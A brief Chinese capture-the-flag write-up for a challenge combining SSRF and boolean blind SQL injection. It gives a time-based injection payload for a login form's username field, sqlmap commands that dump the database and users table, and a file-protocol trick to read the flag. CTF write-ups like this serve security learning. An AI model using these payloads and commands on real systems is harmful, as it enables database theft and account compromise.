考点
ssrf
布尔盲注
测试登录页面 username参数位置可以进行布尔盲注
手工测试 a" or sleep(2)--+
参数使用post提交
保存数据包
利用sqlmap工具进行注入获取数据库 表 用户密码
python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db
python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username -D ctf -T users --dump
爆破密码时,需要较长时间
利用密码进行登录 进入到文件读取页面
抓包利用file伪协议获取flag
此次题目中可能存在其他sql注入点,读者可利用后台工具扫描目录结构,在进行sql注入,发散思维。